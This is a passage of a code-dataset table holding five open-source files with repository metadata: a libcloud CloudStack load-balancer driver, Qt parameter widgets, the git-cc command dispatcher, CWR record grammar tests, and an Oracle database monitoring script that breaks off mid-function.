| repo_name (string, lengths 5 to 92) | path (string, lengths 4 to 232) | copies (string, 19 classes) | size (string, lengths 4 to 7) | content (string, lengths 721 to 1.04M) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51 to 99.9) | line_max (int64, 15 to 997) | alpha_frac (float64, 0.25 to 0.97) | autogenerated (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|
Keisuke69/libcloud | libcloud/loadbalancer/drivers/cloudstack.py | 1 | 4800 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.common.cloudstack import CloudStackConnection, \
CloudStackDriverMixIn
from libcloud.loadbalancer.base import LoadBalancer, Member, Driver, Algorithm
from libcloud.loadbalancer.base import DEFAULT_ALGORITHM
from libcloud.loadbalancer.types import State, LibcloudLBImmutableError
from libcloud.utils import reverse_dict
class CloudStackLBDriver(CloudStackDriverMixIn, Driver):
"""Driver for CloudStack load balancers."""
api_name = 'cloudstack_lb'
_VALUE_TO_ALGORITHM_MAP = {
'roundrobin': Algorithm.ROUND_ROBIN,
'leastconn': Algorithm.LEAST_CONNECTIONS
}
_ALGORITHM_TO_VALUE_MAP = reverse_dict(_VALUE_TO_ALGORITHM_MAP)
LB_STATE_MAP = {
'Active': State.RUNNING,
}
def list_protocols(self):
"""We don't actually have any protocol awareness beyond TCP."""
return [ 'tcp' ]
def list_balancers(self):
balancers = self._sync_request('listLoadBalancerRules')
balancers = balancers.get('loadbalancerrule', [])
return [self._to_balancer(balancer) for balancer in balancers]
def get_balancer(self, balancer_id):
balancer = self._sync_request('listLoadBalancerRules', id=balancer_id)
balancer = balancer.get('loadbalancerrule', [])
if not balancer:
raise Exception("no such load balancer: " + str(balancer_id))
return self._to_balancer(balancer[0])
def create_balancer(self, name, members, protocol='http', port=80,
algorithm=DEFAULT_ALGORITHM, location=None,
private_port=None):
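        """Create a load balancer: pick the first available zone if none is
        given, acquire a public IP in that zone, create the load-balancer
        rule on it, and attach the given members."""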
if location is None:
locations = self._sync_request('listZones')
location = locations['zone'][0]['id']
else:
location = location.id
if private_port is None:
private_port = port
result = self._async_request('associateIpAddress', zoneid=location)
public_ip = result['ipaddress']
result = self._sync_request('createLoadBalancerRule',
algorithm=self._ALGORITHM_TO_VALUE_MAP[algorithm],
name=name,
privateport=private_port,
publicport=port,
publicipid=public_ip['id'],
)
balancer = self._to_balancer(result['loadbalancer'])
for member in members:
balancer.attach_member(member)
return balancer
def destroy_balancer(self, balancer):
self._async_request('deleteLoadBalancerRule', id=balancer.id)
self._async_request('disassociateIpAddress',
id=balancer.ex_public_ip_id)
def balancer_attach_member(self, balancer, member):
member.port = balancer.ex_private_port
self._async_request('assignToLoadBalancerRule', id=balancer.id,
virtualmachineids=member.id)
return True
def balancer_detach_member(self, balancer, member):
self._async_request('removeFromLoadBalancerRule', id=balancer.id,
virtualmachineids=member.id)
return True
def balancer_list_members(self, balancer):
members = self._sync_request('listLoadBalancerRuleInstances',
id=balancer.id)
members = members['loadbalancerruleinstance']
return [self._to_member(m, balancer.ex_private_port) for m in members]
def _to_balancer(self, obj):
balancer = LoadBalancer(
id=obj['id'],
name=obj['name'],
state=self.LB_STATE_MAP.get(obj['state'], State.UNKNOWN),
ip=obj['publicip'],
port=obj['publicport'],
driver=self.connection.driver
)
balancer.ex_private_port = obj['privateport']
balancer.ex_public_ip_id = obj['publicipid']
return balancer
def _to_member(self, obj, port):
return Member(
id=obj['id'],
ip=obj['nic'][0]['ipaddress'],
port=port
)
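

# Illustrative usage sketch (assumptions: credential handling follows the
# generic libcloud driver pattern; 'api key'/'api secret' and the balancer
# parameters below are placeholders, not values from this file):
#
#     driver = CloudStackLBDriver('api key', 'api secret')
#     balancer = driver.create_balancer(name='web', members=[], port=80)
#     print([b.name for b in driver.list_balancers()])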
| apache-2.0 | 400,207,334,912,929,400 | 38.02439 | 78 | 0.63875 | false |
BBN-Q/Quince | quince/param.py | 1 | 16560 | # coding: utf-8
# Raytheon BBN Technologies 2016
# Contributiors: Graham Rowlands
#
# This file contains the parameter descriptions
from qtpy.QtGui import *
from qtpy.QtCore import *
from qtpy.QtWidgets import *
import os
class Parameter(QGraphicsEllipseItem):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
self.name = name
self.parent = parent
rad = 5
super(Parameter, self).__init__(-rad, -rad, 2*rad, 2*rad, parent=parent)
self.has_input = True # Do we draw the connector?
self.interactive = True # Can we modify the value?
self.setBrush(QBrush(QColor(200,200,240)))
self.setPen(Qt.black)
self.setZValue(1)
self.height = 36
self.height_collapsed = 15
self.temp_wire = None
self.wires_in = []
self.wires_out = []
# Text label and area
self.label = QGraphicsTextItem(self.name, parent=self)
self.label.setDefaultTextColor(Qt.black)
self.label.setPos(5,-10)
# Value Box
self.value_box = None
def set_changed_flag(self):
# Would prefer to use signals/slots, but that's apparently too heavy for QGraphics
# Instead we add the name of the changed parameter to the list
if self.parent is not None and not self.parent.changing:
self.parent.changing = True
self.parent.value_changed( self.name )
def set_interactive(self, value):
self.interactive = value
self.value_box.interactive = value
def set_collapsed(self, collapsed):
self.collapsed = collapsed
self.value_box.setVisible(not self.collapsed)
def width(self):
return self.label.boundingRect().topRight().x()
def set_box_width(self, width):
self.value_box.set_box_width(width)
def value(self):
return self.value_box.value()
def set_value(self, value):
self.value_box.set_value(value)
self.set_changed_flag()
def paint(self, painter, options, widget):
if self.has_input:
super(Parameter, self).paint(painter, options, widget)
class NumericalParameter(Parameter):
"""docstring for Parameter"""
def __init__(self, name, datatype, min_value, max_value,
increment, snap, parent=None):
super(NumericalParameter, self).__init__(name, parent=parent)
self.datatype = datatype
self.value_box = SliderBox(
datatype, min_value, max_value, increment, snap,
parent=self)
def set_value(self, value):
self.value_box.set_value(self.datatype(value))
self.set_changed_flag()
class StringParameter(Parameter):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
super(StringParameter, self).__init__(name, parent=parent)
self.value_box = StringBox(parent=self)
self.parent = parent
def set_value(self, value):
self.value_box.set_value(value)
class ComboParameter(StringParameter):
"""docstring for Parameter"""
def __init__(self, name, values, parent=None):
super(ComboParameter, self).__init__(name, parent=parent)
self.value_box.setParentItem(None)
self.value_box = ComboBox(values, parent=self)
def set_collapsed(self, collapsed):
self.collapsed = collapsed
self.value_box.setVisible(not self.collapsed)
class BooleanParameter(Parameter):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
super(BooleanParameter, self).__init__(name, parent=parent)
self.value_box = CheckBox(parent=self)
self.height = 15
self.height_collapsed = 15
def width(self):
return self.label.boundingRect().topRight().x() + 18
class FilenameParameter(StringParameter):
"""docstring for Parameter"""
def __init__(self, name, parent=None):
super(FilenameParameter, self).__init__(name, parent=parent)
self.value_box.setParentItem(None)
self.value_box = FilenameBox(parent=self)
def width(self):
return self.label.boundingRect().topRight().x() + 20
class SliderBox(QGraphicsRectItem):
"""docstring for SliderBox"""
def __init__(self, datatype, min_value, max_value, increment, snap, parent=None):
super(SliderBox, self).__init__(parent=parent)
self.parent = parent
self.dragging = False
self.value_changed = False
self.interactive = True
self.datatype = datatype
self.min_value = min_value
self.max_value = max_value
self.increment = increment
self.snap = snap
self._value = min_value
self.height = 14
self.rect_radius = 7.0
self.control_distance = 0.55228*self.rect_radius
self.setRect(3,15,94,self.height)
self.label = ValueBoxText(self.textFromValue(self._value), parent=self)
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
def paint(self, painter, options, widget):
# Background object is a rounded rectangle
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().bottomLeft())
linear_gradient.setColorAt(0, QColor(150,150,150))
linear_gradient.setColorAt(1, QColor(200,200,200))
        painter.setRenderHint(QPainter.Antialiasing)
painter.setBrush(QBrush(linear_gradient))
painter.setPen(QPen(QColor(200,200,200), 0.75))
painter.drawRoundedRect(self.rect(), self.rect_radius, self.rect_radius)
# Draw the bar using a round capped line
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().topRight())
linear_gradient.setColorAt(0, QColor(180,180,220))
linear_gradient.setColorAt(1, QColor(80,80,100))
painter.setPen(QPen(QBrush(linear_gradient), 0.9*self.height, Qt.SolidLine, Qt.RoundCap))
path = QPainterPath()
path.moveTo(3+self.rect_radius, 15 + 0.5*self.height)
fill_size = (self.rect().width()-2*self.rect_radius)*(self._value-self.min_value)/(self.max_value-self.min_value)
        path.lineTo(3+self.rect_radius+fill_size, 15 + 0.5*self.height)
painter.drawPath(path)
# Draw the highlight line similarly
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().bottomLeft())
linear_gradient.setColorAt(0, QColor(240,240,240,150))
linear_gradient.setColorAt(0.3, QColor(240,240,240,00))
painter.setPen(QPen(QBrush(linear_gradient), 0.9*self.height, Qt.SolidLine, Qt.RoundCap))
path = QPainterPath()
path.moveTo(3+self.rect_radius, 15.0 + 0.5*self.height)
path.lineTo(3+self.rect_radius+fill_size, 15.0 + 0.5*self.height)
painter.drawPath(path)
def valueFromText(self, text):
try:
if self.datatype is int:
val = int(str(text))
else:
val = float(str(text))
return val
        except (TypeError, ValueError):
self.scene().window.set_status("Got unreasonable input...")
return self._value
def textFromValue(self, value):
if self.datatype is int:
return ("{:d}".format(value))
else:
return ("{:.4g}".format(value))
def set_value(self, val):
changed = False
val = self.valueFromText(val)
if val >= self.min_value and val <= self.max_value:
if self.snap:
                val = round(val / self.snap) * self.snap  # snap to the nearest multiple
self._value = self.datatype(val)
changed = True
elif val < self.min_value:
self._value = self.datatype(self.min_value)
changed = True
else:
self._value = self.datatype(self.max_value)
changed = True
self.label.full_text = self.textFromValue(self._value)
self.label.setPlainText(self.textFromValue(self._value))
self.refresh_label()
self.update()
if changed:
self.parent.set_changed_flag()
def refresh_label(self):
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
self.update()
def value(self):
return self._value
def set_box_width(self, width):
self.setRect(3,15, width-6, self.height)
label_width = self.label.boundingRect().topRight().x()
self.label.clip_text()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
def mousePressEvent(self, event):
if self.interactive:
self.dragging = True
self.original_value = self._value
self.drag_start = event.scenePos()
else:
            super(SliderBox, self).mousePressEvent(event)
def mouseMoveEvent(self, event):
if self.interactive:
if self.dragging:
delta = event.scenePos() - self.drag_start
value_change = self.increment*int(delta.x()/10.0)
if value_change != 0.0:
self.value_changed = True
self.set_value(self.original_value + value_change)
else:
super(SliderBox, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
if self.interactive:
self.dragging = False
if not self.value_changed:
self.label.setPos(3+5,15-5)
self.label.set_text_interaction(True)
self.value_changed = False
else:
            super(SliderBox, self).mouseReleaseEvent(event)
class StringBox(QGraphicsRectItem):
"""docstring for SliderBox"""
def __init__(self, parent=None):
        super(StringBox, self).__init__(parent=parent)
        self.parent = parent
        self.clicked = False
        self._value = ""
self.height = 14
self.rect_radius = 7.0
self.control_distance = 0.55228*self.rect_radius
self.setRect(3,15,94,self.height)
self.label = ValueBoxText(self._value, parent=self)
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
def paint(self, painter, options, widget):
# Background object is a rounded rectangle
linear_gradient = QLinearGradient(self.rect().topLeft(), self.rect().bottomLeft())
linear_gradient.setColorAt(0, QColor(150,150,150))
linear_gradient.setColorAt(1, QColor(200,200,200))
        painter.setRenderHint(QPainter.Antialiasing)
painter.setBrush(QBrush(linear_gradient))
painter.setPen(QPen(QColor(200,200,200), 0.75))
painter.drawRoundedRect(self.rect(), self.rect_radius, self.rect_radius)
def set_value(self, value):
self._value = value
self.label.full_text = value
self.label.setPlainText(value)
self.label.clip_text()
self.refresh_label()
self.update()
if hasattr(self, 'parent'):
self.parent.set_changed_flag()
def refresh_label(self):
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
self.update()
def value(self):
return self._value
def set_box_width(self, width):
self.setRect(3,15, width-6, self.height)
self.label.clip_text()
self.refresh_label()
def mousePressEvent(self, event):
self.clicked = True
def mouseReleaseEvent(self, event):
if self.clicked:
self.label.setPos(3+5,15-5)
self.label.set_text_interaction(True)
self.clicked = False
class FilenameBox(StringBox):
"""docstring for FilenameBox"""
def __init__(self, parent=None):
super(FilenameBox, self).__init__(parent=parent)
self.browse_button = QGraphicsRectItem(self.rect().width()-16, -3, 15, 12, parent=self)
self.browse_button.setBrush(QBrush(QColor(220,220,220)))
self.browse_button.mousePressEvent = lambda e: self.save_file()
# self.browse_button.mouseReleaseEvent = lambda e: self.save_file()
def save_file(self):
path = os.path.dirname(os.path.realpath(__file__))
fn = QFileDialog.getSaveFileName(None, 'Save Results As', path)
self.set_value(fn[0])
self.label.clip_text()
self.refresh_label()
def refresh_label(self):
label_width = self.label.boundingRect().topRight().x()
self.label.setPos(3+0.5*self.rect().width()-0.5*label_width,15-5)
self.browse_button.setRect(self.rect().width()-16, -3, 15, 12)
self.update()
class ComboBox(StringBox):
"""docstring for ComboBox"""
def __init__(self, values, parent=None):
super(ComboBox, self).__init__(parent=parent)
self.values = values
def menu_changed(self, action):
self.set_value(action.data())
def mousePressEvent(self, event):
self.clicked = True
def mouseReleaseEvent(self, event):
if self.clicked:
menu = QMenu()
for v in self.values:
act = QAction(v, self.scene())
act.setData(v)
menu.addAction(act)
menu.triggered.connect(self.menu_changed)
menu.exec_(event.screenPos())
self.clicked = False
class CheckBox(QGraphicsRectItem):
"""docstring for CheckBox"""
def __init__(self, parent=None):
super(CheckBox, self).__init__(parent=parent)
self.parent = parent
self.setRect(self.rect().width()-17, -3, 13, 13)
self.unchecked_brush = QBrush(QColor(220,220,220))
self.checked_brush = QBrush(QColor(40,40,40))
self.setBrush(self.unchecked_brush)
self._value = False
self.clicked = False
def set_box_width(self, width):
self.setRect(width-17, -3, 13, 13)
def value(self):
return self._value
def set_value(self, value):
self._value = value
if self._value:
self.setBrush(self.checked_brush)
else:
self.setBrush(self.unchecked_brush)
def mousePressEvent(self, event):
self.clicked = True
def mouseReleaseEvent(self, event):
if self.clicked:
self.set_value(not self._value)
self.clicked = False
class ValueBoxText(QGraphicsTextItem):
"""docstring for ValueBoxText"""
def __init__(self, string, parent=None):
super(ValueBoxText, self).__init__(string, parent=parent)
self.setTextInteractionFlags(Qt.NoTextInteraction)
        self.setFlag(QGraphicsItem.ItemIsFocusable, True)
self.parent = parent
self.full_text = string
self.clip_text()
def set_text_interaction(self, value):
if value and (self.textInteractionFlags() == Qt.NoTextInteraction):
self.setTextInteractionFlags(Qt.TextEditorInteraction)
self.setPlainText(self.full_text)
self.setFocus(Qt.MouseFocusReason)
self.setSelected(True)
c = self.textCursor()
c.select(QTextCursor.Document)
self.setTextCursor(c)
elif not value and (self.textInteractionFlags() == Qt.TextEditorInteraction):
self.setTextInteractionFlags(Qt.NoTextInteraction)
c = self.textCursor()
c.clearSelection()
self.setTextCursor(c)
self.clearFocus()
def clip_text(self):
if self.parent.rect().width() < self.boundingRect().topRight().x():
clipped = self.full_text[:int(self.parent.rect().width()/7)-3]
if int(self.parent.rect().width()/6)-3 == len(self.full_text)-1:
self.setPlainText(clipped)
else:
self.setPlainText(clipped+"...")
def focusOutEvent(self, event):
self.full_text = self.toPlainText()
self.set_text_interaction(False)
self.parent.set_value(self.full_text)
self.clip_text()
self.parent.refresh_label()
return super(ValueBoxText, self).focusOutEvent(event)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:
self.full_text = self.toPlainText()
self.set_text_interaction(False)
self.parent.set_value(self.full_text)
self.clip_text()
self.parent.refresh_label()
else:
return super(ValueBoxText, self).keyPressEvent(event)
| apache-2.0 | 6,470,298,466,741,095,000 | 35.315789 | 121 | 0.61087 | false |
charleso/git-cc | git_cc/gitcc.py | 1 | 2009 | #!/usr/bin/env python
import inspect
import sys
from optparse import OptionParser
from . import checkin
from . import init
from . import rebase
from . import reset
from . import sync
from . import tag
from . import update
from . import version
commands = [
init, rebase, checkin, sync, reset, tag, update, version
]
def main():
args = sys.argv[1:]
for cmd in commands:
if args and get_module_name(cmd) == args[0]:
return invoke(cmd, args)
usage()
def invoke(cmd, args):
_args, _, _, defaults = inspect.getargspec(cmd.main)
defaults = defaults if defaults else []
diff = len(_args) - len(defaults)
_args = _args[diff:]
parser = OptionParser(description=cmd.__doc__)
for (name, default) in zip(_args, defaults):
option = {
'default': default,
'help': cmd.ARGS[name],
'dest': name,
}
if default is False:
option['action'] = "store_true"
elif default is None:
option['action'] = "store"
name = name.replace('_', '-')
parser.add_option('--' + name, **option)
(options, args) = parser.parse_args(args[1:])
if len(args) < diff:
parser.error("incorrect number of arguments")
for name in _args:
args.append(getattr(options, name))
cmd.main(*args)
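

# Illustrative sketch of the command-module contract that invoke() relies on
# (hypothetical example, not an actual git-cc command): positional parameters
# of main() become required command-line arguments, keyword parameters become
# --options, and the module-level ARGS dict supplies their help text, e.g.
#
#     ARGS = {'dry_run': "print what would happen without checking in"}
#
#     def main(branch, dry_run=False):
#         ...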
def usage():
print('usage: gitcc COMMAND [ARGS]\n')
width = 11
for cmd in commands:
print(' %s %s' % (get_module_name(cmd).ljust(width),
cmd.__doc__.split('\n')[0]))
sys.exit(2)
def get_module_name(module):
"""Return the name of the given module, without the package name.
For example, if the given module is checkin, the module name is
"git_cc.checkin" and without the package name is "checkin".
Note that the given module should already have been imported.
"""
_, _, module_name = module.__name__.rpartition('.')
return module_name
if __name__ == '__main__':
main()
| gpl-2.0 | 6,877,740,957,302,435,000 | 25.090909 | 69 | 0.590841 | false |
weso/CWR-DataApi | tests/grammar/factory/record/test_work_conflict.py | 1 | 6028 | # -*- coding: utf-8 -*-
import unittest
from pyparsing import ParseException
from tests.utils.grammar import get_record_grammar
"""
CWR Work conflict grammar tests.
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestWorkValid(unittest.TestCase):
"""
Tests that the Work grammar decodes correctly formatted strings
"""
def setUp(self):
self.grammar = get_record_grammar('work_conflict')
def test_valid_full(self):
"""
Tests that the Work grammar decodes correctly formatted Work record.
This test contains all the optional fields.
"""
record = 'EXC0000123400000023TITLE OF THE WORK ENABCD0123456789T012345678920130102AB0123456789POP030201YMUSPOTMODMOVORIORITHE CONTACT A123456789ARY01220140302Y28#3 KV 297#1 Y'
result = self.grammar.parseString(record)[0]
self.assertEqual('EXC', result.record_type)
self.assertEqual(1234, result.transaction_sequence_n)
self.assertEqual(23, result.record_sequence_n)
self.assertEqual('TITLE OF THE WORK', result.title)
self.assertEqual('EN', result.language_code)
self.assertEqual('ABCD0123456789', result.submitter_work_n)
self.assertEqual('T0123456789', result.iswc)
self.assertEqual(1, result.copyright_date.month)
self.assertEqual(2, result.copyright_date.day)
self.assertEqual(2013, result.copyright_date.year)
self.assertEqual('AB0123456789', result.copyright_number)
self.assertEqual('POP', result.musical_work_distribution_category)
self.assertEqual(3, result.duration.hour)
self.assertEqual(2, result.duration.minute)
self.assertEqual(1, result.duration.second)
self.assertEqual('Y', result.recorded_indicator)
self.assertEqual('MUS', result.text_music_relationship)
self.assertEqual('POT', result.composite_type)
self.assertEqual('MOD', result.version_type)
self.assertEqual('MOV', result.excerpt_type)
self.assertEqual('ORI', result.music_arrangement)
self.assertEqual('ORI', result.lyric_adaptation)
self.assertEqual('THE CONTACT', result.contact_name)
self.assertEqual('A123456789', result.contact_id)
self.assertEqual('AR', result.work_type)
self.assertEqual(True, result.grand_rights_indicator)
self.assertEqual(12, result.composite_component_count)
self.assertEqual(2, result.date_publication_printed_edition.day)
self.assertEqual(3, result.date_publication_printed_edition.month)
self.assertEqual(2014, result.date_publication_printed_edition.year)
self.assertEqual('Y', result.exceptional_clause)
self.assertEqual('28#3', result.opus_number)
self.assertEqual('KV 297#1', result.catalogue_number)
self.assertEqual('Y', result.priority_flag)
def test_valid_minimum(self):
"""
Tests that the Work grammar decodes correctly formatted Work record.
This test contains no optional fields.
"""
record = 'EXC0000123400000023TITLE OF THE WORK ENABCD0123456789T012345678920130102AB0123456789POP030201YMUS ORIMOV THE CONTACT A123456789 00020140302Y28#3 KV 297#1 Y'
result = self.grammar.parseString(record)[0]
self.assertEqual('EXC', result.record_type)
self.assertEqual(1234, result.transaction_sequence_n)
self.assertEqual(23, result.record_sequence_n)
self.assertEqual('TITLE OF THE WORK', result.title)
self.assertEqual('EN', result.language_code)
self.assertEqual('ABCD0123456789', result.submitter_work_n)
self.assertEqual('T0123456789', result.iswc)
self.assertEqual(1, result.copyright_date.month)
self.assertEqual(2, result.copyright_date.day)
self.assertEqual(2013, result.copyright_date.year)
self.assertEqual('AB0123456789', result.copyright_number)
self.assertEqual('POP', result.musical_work_distribution_category)
self.assertEqual(3, result.duration.hour)
self.assertEqual(2, result.duration.minute)
self.assertEqual(1, result.duration.second)
self.assertEqual('Y', result.recorded_indicator)
self.assertEqual('MUS', result.text_music_relationship)
self.assertEqual(None, result.composite_type)
self.assertEqual('ORI', result.version_type)
self.assertEqual('MOV', result.excerpt_type)
self.assertEqual(None, result.music_arrangement)
self.assertEqual(None, result.lyric_adaptation)
self.assertEqual('THE CONTACT', result.contact_name)
self.assertEqual('A123456789', result.contact_id)
self.assertEqual(None, result.work_type)
self.assertEqual(None, result.grand_rights_indicator)
self.assertEqual(0, result.composite_component_count)
self.assertEqual(2, result.date_publication_printed_edition.day)
self.assertEqual(3, result.date_publication_printed_edition.month)
self.assertEqual(2014, result.date_publication_printed_edition.year)
self.assertEqual('Y', result.exceptional_clause)
self.assertEqual('28#3', result.opus_number)
self.assertEqual('KV 297#1', result.catalogue_number)
self.assertEqual('Y', result.priority_flag)
class TestIPAGrammarException(unittest.TestCase):
def setUp(self):
self.grammar = get_record_grammar('work_conflict')
def test_empty(self):
"""
Tests that a exception is thrown when the the works number is zero.
"""
record = ''
self.assertRaises(ParseException, self.grammar.parseString, record)
def test_invalid(self):
record = 'This is an invalid string'
self.assertRaises(ParseException, self.grammar.parseString, record)
| mit | 8,374,611,062,530,791,000 | 45.007634 | 279 | 0.672972 | false |
G8bao7/camelbell-server | check_oracle.py | 1 | 10171 | #!//bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
import cx_Oracle
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("oracle")
path='./include'
sys.path.insert(0,path)
import functions as func
import camelbell_oracle as oracle
from multiprocessing import Process;
def check_oracle(host,port,dsn,username,password,server_id,tags):
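    """Collect status metrics from a single Oracle instance and store them
    in the monitoring MySQL database. Per-second rates are computed as the
    difference between two v$sysstat snapshots taken one second apart.
    """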
url = "%s:%s/%s" % (host, port, dsn)
logger_msg = "[BBQ]begin check oracle %s " %(url)
logger.info(logger_msg)
retry = 4
conn = None
for i in range(1,retry):
try:
logger_msg="[BBQ] oracle connect %s retry [%s]" %(url, i)
logger.info(logger_msg)
            conn = cx_Oracle.connect(username, password, url)  # obtain the connection object
break
except Exception, e:
logger_msg="[BBQ] oracle connect %s, %s" %(url,str(e).strip('\n'))
logger.warning(logger_msg)
conn = None
continue
func.check_db_status(server_id,host,port,tags,'oracle')
if conn == None:
try:
connect=0
sql="replace into oracle_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
except Exception, e:
logger.error(str(e).strip('\n'))
sys.exit(1)
finally:
sys.exit(1)
try:
#get info by v$instance
connect = 1
instance_name = oracle.get_instance(conn,'instance_name')
instance_role = oracle.get_instance(conn,'instance_role')
database_role = oracle.get_database(conn,'database_role')
open_mode = oracle.get_database(conn,'open_mode')
protection_mode = oracle.get_database(conn,'protection_mode')
if database_role == 'PRIMARY':
database_role_new = 'm'
dg_stats = '-1'
dg_delay = '-1'
else:
database_role_new = 's'
dg_stats = oracle.get_dg_stats(conn)
dg_delay = oracle.get_dg_delay(conn)
instance_status = oracle.get_instance(conn,'status')
startup_time = oracle.get_instance(conn,'startup_time')
#print startup_time
#startup_time = time.strftime('%Y-%m-%d %H:%M:%S',startup_time)
#localtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
#uptime = (localtime - startup_time).seconds
#print uptime
        uptime = oracle.get_instance(conn,'startup_time')  # NOTE: reuses startup_time; elapsed uptime is not computed here
version = oracle.get_instance(conn,'version')
instance_status = oracle.get_instance(conn,'status')
database_status = oracle.get_instance(conn,'database_status')
host_name = oracle.get_instance(conn,'host_name')
archiver = oracle.get_instance(conn,'archiver')
#get info by sql count
session_total = oracle.get_sessions(conn)
session_actives = oracle.get_actives(conn)
session_waits = oracle.get_waits(conn)
#get info by v$parameters
parameters = oracle.get_parameters(conn)
processes = parameters['processes']
##get info by v$parameters
sysstat_0 = oracle.get_sysstat(conn)
time.sleep(1)
sysstat_1 = oracle.get_sysstat(conn)
session_logical_reads_persecond = sysstat_1['session logical reads']-sysstat_0['session logical reads']
physical_reads_persecond = sysstat_1['physical reads']-sysstat_0['physical reads']
physical_writes_persecond = sysstat_1['physical writes']-sysstat_0['physical writes']
physical_read_io_requests_persecond = sysstat_1['physical write total IO requests']-sysstat_0['physical write total IO requests']
physical_write_io_requests_persecond = sysstat_1['physical read IO requests']-sysstat_0['physical read IO requests']
db_block_changes_persecond = sysstat_1['db block changes']-sysstat_0['db block changes']
os_cpu_wait_time = sysstat_0['OS CPU Qt wait time']
logons_persecond = sysstat_1['logons cumulative']-sysstat_0['logons cumulative']
logons_current = sysstat_0['logons current']
opened_cursors_persecond = sysstat_1['opened cursors cumulative']-sysstat_0['opened cursors cumulative']
opened_cursors_current = sysstat_0['opened cursors current']
user_commits_persecond = sysstat_1['user commits']-sysstat_0['user commits']
user_rollbacks_persecond = sysstat_1['user rollbacks']-sysstat_0['user rollbacks']
user_calls_persecond = sysstat_1['user calls']-sysstat_0['user calls']
db_block_gets_persecond = sysstat_1['db block gets']-sysstat_0['db block gets']
#print session_logical_reads_persecond
##################### insert data to mysql server#############################
func.mysql_exec("replace into oracle_status_history SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from oracle_status where host='%s' and port=%s;" % (host, port),'')
func.mysql_exec("delete from oracle_status where host='%s' and port=%s;" % (host, port),'')
sql = "insert into oracle_status(server_id,host,port,tags,connect,instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond)
func.mysql_exec(sql,param)
logger.info("Finish INSERT DATA ")
func.update_db_status_init(server_id,database_role_new,version,host,port,tags)
logger.info("Finish update_db_status_init")
#check tablespace
qSql = "select 1 from oracle_tablespace where host='%s' and port=%s and create_time>=curdate() limit 1" % (host,port)
        if func.mysql_query(qSql) == 0:
func.mysql_exec("insert ignore into oracle_tablespace_history SELECT *,LEFT(REPLACE(REPLACE(REPLACE(create_time,'-',''),' ',''),':',''),12) from oracle_tablespace where host='%s' and port=%s;" % (host, port),'')
func.mysql_exec("delete from oracle_tablespace where host='%s' and port=%s;" % (host, port),'')
tablespace = oracle.get_tablespace(conn)
if tablespace:
for line in tablespace:
ts_name=line[0]
if igTsNames.count(ts_name) > 0:
continue
sql="insert into oracle_tablespace(server_id,host,port,tags,tablespace_name,total_size,used_size,avail_size,used_rate) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,line[0],line[1],line[2],line[3],int(line[4].rstrip("%")))
logger.info(param)
func.mysql_exec(sql,param)
else:
logger.info("%s:%s today has stat oracle_tablespace. will not do" % (host,port))
logger.info("Finish oracle_tablespace")
except Exception, e:
logger.error(e)
sys.exit(1)
finally:
conn.close()
def main():
#get oracle servers list
#servers=func.mysql_query("select id,host,port,dsn,username,password,tags from db_servers_oracle where is_delete=0 and monitor=1;")
servers=func.mysql_query("select id,host,port,dsn,tags from db_servers_oracle where is_delete=0 and monitor=1;")
#++ guoqi
cnfKey = "monitor_oracle"
username = func.get_config(cnfKey,'user')
password = func.get_config(cnfKey,'passwd')
min_interval = func.get_option('min_interval')
logger.info("check oracle controller start.")
if servers:
plist = []
